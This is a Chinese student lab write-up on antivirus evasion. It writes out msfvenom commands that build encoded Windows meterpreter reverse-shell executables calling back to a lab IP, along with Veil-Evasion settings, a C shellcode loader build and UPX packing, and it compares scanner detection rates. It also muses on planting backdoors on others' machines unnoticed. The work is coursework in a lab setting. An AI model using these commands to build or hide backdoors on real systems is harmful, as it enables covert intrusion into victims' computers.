20155229《网络对抗技术》Exp3：免杀原理与实践

实验预习

免杀： 看为一种能使病毒木马避免被杀毒软件查杀的技术。

免杀的分类：

• 开源免杀：指在有病毒、木马源代码的前提下，通过修改源代码进行免杀。。
• 手工免杀：指在仅有病毒、木马的可执行文件(.exe)（PE文件）的情况下进行免杀。：

文件免杀方法：

• 加冷门壳
• 加壳改壳：在加壳的基础上进行修改。
• 加花指令：加花的原理就是通过添加加花指令让杀毒软件检测不到特征码，干扰杀毒软件正常的检测。
• 改程序入口点：修改程序入口点

---

实验内容

msfvenom直接生成meterpreter可执行文件

Msfvenom使用编码器

写在前面：我的文件放入主机上自动就被360杀毒杀去了，实验中我将360杀毒关去，所以没有用360进行扫描，也没有弄360扫描的结果。

• 使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.126.135 LPORT=5229 -f exe > fyhtvxq.exe进行编码。

• 然后将其放到 http://r.virscan.org/该网站进行检测。

• 结果如下：

• 结果和我想象的不一样啊，为什么会什么都没有呢，使用# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.126.135 LPORT=5229 -f exe > fyhtvxq.exe进行多次编码，结果还是一样。去查了一些同学的博客，发现没有人遇到我这种问题。。。我也没找到解决的办法。。。

• 而后来我用上周实验生成编码的方式又重新试了一遍，发现能够检测出危险。# msfvenom -p windows/meterpreter/reverse_tcp -e LHOST=192.168.126.135 LPORT=5229 -f exe > fyhtvxq.exe

• 上周的编码是很有问题的是显而易见的，毕竟能够监控别的主机，可是很坏了，但是同时也说明有些杀毒软件连这个都没查出来，是不是有些菜啊。。。

Veil-Evasion

• Veil-Evasion是一个免杀平台，与Metasploit有点类似，用其他语言如c,c#,phython,ruby,go,powershell等重写了meterperter，然后再通过不同方式编译成exe，共性特征比较少。

• 输入veil进入平台
  

• 输入

use python/meterpreter/rev_tcp设置payload

set LHOST 192.168.126.135设置反弹IP地址

set LPORT 5229设置反弹端口

generate生成文件

• 然后对文件进行命名，但会出现错误

• 于是将程序换成C语言，重新按照上述步骤在走一遍，可以生成可执行文件

• 再将该文件放入网站中进行检测（因为刚开始找的是其他文件夹，所以又生成了好几个.exe文件，结果发现文件夹找错了）

• 本次只有10个软件检测出来了，看来veil平台生成的文件，还是有些小厉害的。

---

因为之前自己做的时候回连失败，而且忘记截图了，今天下午实验课，我用veil新生成的fyh5629.exe文件进行了回连，并且成功。（弥补一下之前的失败~）

C语言调用Shellcode

• 使用# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.135 LPORT=5229 -f c命令生成一个shellcode数组

• 然后将该数组编写一个程序，用i686-w64-mingw32-g++ shellfyh.c -o met5229.exe命令将该代码转换为.exe文件。

• 对该.exe文件 进行检测，比veil平台的文件还要厉害些！

• 将该文件传入win7虚拟机中，想进行回连，但是立马就被我在安装win7上的360给清除了。。。

---

实验课我弥补了一下自己做的时候的回连失败（实验课fyh5729.exe回连成功），并且我也不知到为什么360安全卫士没有扫描出问题

• 打开VS，将shellcode数组重新编一个c代码，但是不管怎么生成，一直都会报错，在网上找了解决的方案，

项目右键->属性->配置属性->C/C++->常规->附加包含目录 输入$(ProjectDir)

• 但是还是没法编译，我只好放弃这种方法。。。

加壳

• 加壳的全称应该是可执行程序资源压缩，压缩后的程序可以直接运行。

• UPX是压缩壳，减少应用体积。

• 使用命令upx 需要加壳的文件名 -o 加壳后的文件名对想加壳的.exe文件进行加壳，加壳后进行检测。

• 然后使用刚加壳出炉的fyh5229.exe想对其进行加壳，但是失败了，不能进行多次加壳。

• 然后我将之前通过veil生成的文件进行加壳，然后检测，可是结果并没有好太多。

用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

---

基础问题问答

（1）杀软是如何检测出恶意代码的？

答：

• 我认为杀软会根据代码是否会对电脑系统、文件等做出不好的行动，来判断该代码是否为恶意代码。

• 在以前检测出的恶意代码的基础上，会留意与之相类似的代码，来判断。

（2）免杀是做什么？

答： 一种能使病毒木马避免被杀毒软件查杀的技术。

（3）免杀的基本方法有哪些？

答：

• 加冷门壳
• 加壳改壳：在加壳的基础上进行修改。
• 加花指令：加花的原理就是通过添加加花指令让杀毒软件检测不到特征码，干扰杀毒软件正常的检测。
• 改程序入口点：修改程序入口点

---

离实战还缺些什么技术或步骤？

• 怎样安全又稳妥一次的将后门程序放入其他人的主机，且不会被发现。杀毒软件在更新，人们的 防范心理也在变强，所以想让靶机的主人对文件“上当”也有难度。

---

实验中遇到的问题及解决

遇到的问题不管有没有解决已经在上述实验内容中了。。。

---

实验总结与体会

相比于上次实验的小马宝丽，这次实验给我更多的收获是，一次一次对制作出来的文件进行检测，比较每次被检测出来的比例，想要将文件的危险指数降低，这样让自己有更多的自豪感，当然也就只能做出来玩玩，毕竟不能干坏事，但是大家都会制作后门了，可能还是要防范一下大家？哈哈哈哈哈开玩笑(●'◡'●)。